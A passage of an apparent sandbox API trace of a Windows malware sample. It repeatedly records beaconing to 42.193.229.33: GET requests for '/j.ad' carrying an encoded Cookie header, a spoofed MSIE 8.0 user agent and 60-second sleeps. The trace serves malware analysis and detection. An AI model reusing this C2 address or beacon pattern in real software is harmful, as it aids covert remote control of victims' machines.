[0251.080] htonl (hostlong=0x0) returned 0x0 [0251.080] htonl (hostlong=0x3000000) returned 0x3 [0251.080] htonl (hostlong=0x6000000) returned 0x6 [0251.080] htonl (hostlong=0x6000000) returned 0x6 [0251.080] GetLastError () returned 0x0 [0251.080] htonl (hostlong=0x0) returned 0x0 [0251.080] GetLastError () returned 0x0 [0251.080] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0251.081] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0253.070] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0253.070] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0253.070] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0253.070] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0253.070] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0253.071] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0253.071] Sleep (dwMilliseconds=0xea60) [0253.085] GetLastError () returned 0x2efd [0253.086] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0253.086] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0253.086] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0253.086] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0253.086] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0253.086] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0253.086] GetLastError () returned 0x0 [0253.086] htonl (hostlong=0x7000000) returned 0x7 [0253.086] htonl (hostlong=0x0) returned 0x0 [0253.086] htonl (hostlong=0x3000000) returned 0x3 [0253.086] htonl (hostlong=0x6000000) returned 0x6 [0253.086] htonl (hostlong=0x6000000) returned 0x6 [0253.086] GetLastError () returned 0x0 [0253.086] htonl (hostlong=0x0) returned 0x0 [0253.086] GetLastError () returned 0x0 [0253.086] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0253.087] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0255.077] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0255.077] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0255.077] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0255.078] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0255.078] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0255.078] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0255.078] Sleep (dwMilliseconds=0xea60) [0255.082] GetLastError () returned 0x2efd [0255.083] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0255.083] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0255.083] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0255.083] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0255.083] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0255.083] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0255.083] GetLastError () returned 0x0 [0255.083] htonl (hostlong=0x7000000) returned 0x7 [0255.083] htonl (hostlong=0x0) returned 0x0 [0255.083] htonl (hostlong=0x3000000) returned 0x3 [0255.083] htonl (hostlong=0x6000000) returned 0x6 [0255.083] htonl (hostlong=0x6000000) returned 0x6 [0255.083] GetLastError () returned 0x0 [0255.084] htonl (hostlong=0x0) returned 0x0 [0255.084] GetLastError () returned 0x0 [0255.084] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0255.084] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0262.270] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0262.270] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0262.270] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0262.270] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0262.270] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0262.270] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0262.270] Sleep (dwMilliseconds=0xea60) [0262.280] GetLastError () returned 0x2efd [0262.281] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0262.282] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0262.282] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0262.282] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0262.282] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0262.282] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0262.282] GetLastError () returned 0x0 [0262.282] htonl (hostlong=0x7000000) returned 0x7 [0262.282] htonl (hostlong=0x0) returned 0x0 [0262.282] htonl (hostlong=0x3000000) returned 0x3 [0262.282] htonl (hostlong=0x6000000) returned 0x6 [0262.282] htonl (hostlong=0x6000000) returned 0x6 [0262.282] GetLastError () returned 0x0 [0262.283] htonl (hostlong=0x0) returned 0x0 [0262.283] GetLastError () returned 0x0 [0262.283] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0262.283] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0264.275] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0264.275] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0264.275] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0264.276] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0264.276] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0264.276] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0264.276] Sleep (dwMilliseconds=0xea60) [0264.286] GetLastError () returned 0x2efd [0264.292] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0264.292] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0264.292] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0264.292] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0264.292] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0264.292] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0264.293] GetLastError () returned 0x0 [0264.293] htonl (hostlong=0x7000000) returned 0x7 [0264.293] htonl (hostlong=0x0) returned 0x0 [0264.293] htonl (hostlong=0x3000000) returned 0x3 [0264.293] htonl (hostlong=0x6000000) returned 0x6 [0264.293] htonl (hostlong=0x6000000) returned 0x6 [0264.293] GetLastError () returned 0x0 [0264.293] htonl (hostlong=0x0) returned 0x0 [0264.293] GetLastError () returned 0x0 [0264.293] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0264.293] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0266.280] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0266.280] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0266.280] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0266.280] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0266.280] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0266.280] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0266.281] Sleep (dwMilliseconds=0xea60) [0266.286] GetLastError () returned 0x2efd [0266.286] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0266.286] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0266.286] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0266.286] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0266.287] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0266.287] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0266.287] GetLastError () returned 0x0 [0266.287] htonl (hostlong=0x7000000) returned 0x7 [0266.287] htonl (hostlong=0x0) returned 0x0 [0266.287] htonl (hostlong=0x3000000) returned 0x3 [0266.287] htonl (hostlong=0x6000000) returned 0x6 [0266.287] htonl (hostlong=0x6000000) returned 0x6 [0266.287] GetLastError () returned 0x0 [0266.287] htonl (hostlong=0x0) returned 0x0 [0266.287] GetLastError () returned 0x0 [0266.287] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0266.287] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0268.267] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0268.267] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0268.267] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0268.267] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0268.267] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0268.267] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0268.267] Sleep (dwMilliseconds=0xea60) [0268.291] GetLastError () returned 0x2efd [0268.291] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0268.292] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0268.292] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0268.292] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0268.292] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0268.292] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0268.292] GetLastError () returned 0x0 [0268.292] htonl (hostlong=0x7000000) returned 0x7 [0268.293] htonl (hostlong=0x0) returned 0x0 [0268.293] htonl (hostlong=0x3000000) returned 0x3 [0268.293] htonl (hostlong=0x6000000) returned 0x6 [0268.293] htonl (hostlong=0x6000000) returned 0x6 [0268.293] GetLastError () returned 0x0 [0268.293] htonl (hostlong=0x0) returned 0x0 [0268.293] GetLastError () returned 0x0 [0268.293] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0268.293] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0270.271] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0270.271] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0270.271] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0270.271] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0270.271] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0270.271] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0270.271] Sleep (dwMilliseconds=0xea60) [0270.279] GetLastError () returned 0x2efd [0270.279] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0270.280] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0270.280] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0270.280] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0270.280] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0270.280] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0270.280] GetLastError () returned 0x0 [0270.280] htonl (hostlong=0x7000000) returned 0x7 [0270.280] htonl (hostlong=0x0) returned 0x0 [0270.280] htonl (hostlong=0x3000000) returned 0x3 [0270.280] htonl (hostlong=0x6000000) returned 0x6 [0270.280] htonl (hostlong=0x6000000) returned 0x6 [0270.280] GetLastError () returned 0x0 [0270.280] htonl (hostlong=0x0) returned 0x0 [0270.280] GetLastError () returned 0x0 [0270.280] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0270.280] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0272.295] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0272.295] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0272.295] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0272.297] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0272.299] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0272.299] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0272.300] Sleep (dwMilliseconds=0xea60) [0272.308] GetLastError () returned 0x2efd [0272.308] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0272.309] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0272.309] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0272.309] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0272.309] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0272.309] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0272.309] GetLastError () returned 0x0 [0272.311] htonl (hostlong=0x7000000) returned 0x7 [0272.311] htonl (hostlong=0x0) returned 0x0 [0272.313] htonl (hostlong=0x3000000) returned 0x3 [0272.313] htonl (hostlong=0x6000000) returned 0x6 [0272.313] htonl (hostlong=0x6000000) returned 0x6 [0272.313] GetLastError () returned 0x0 [0272.314] htonl (hostlong=0x0) returned 0x0 [0272.314] GetLastError () returned 0x0 [0272.315] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0272.315] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0274.324] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0274.325] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0274.325] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0274.325] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0274.325] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0274.325] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0274.325] Sleep (dwMilliseconds=0xea60) [0274.337] GetLastError () returned 0x2efd [0274.337] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0274.337] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0274.337] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0274.337] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0274.338] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0274.338] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0274.338] GetLastError () returned 0x0 [0274.338] htonl (hostlong=0x7000000) returned 0x7 [0274.338] htonl (hostlong=0x0) returned 0x0 [0274.338] htonl (hostlong=0x3000000) returned 0x3 [0274.338] htonl (hostlong=0x6000000) returned 0x6 [0274.338] htonl (hostlong=0x6000000) returned 0x6 [0274.338] GetLastError () returned 0x0 [0274.338] htonl (hostlong=0x0) returned 0x0 [0274.338] GetLastError () returned 0x0 [0274.338] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0274.338] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0276.308] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0276.308] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0276.308] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0276.308] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0276.308] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0276.308] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0276.308] Sleep (dwMilliseconds=0xea60) [0276.325] GetLastError () returned 0x2efd [0276.325] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0276.325] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0276.325] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0276.325] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 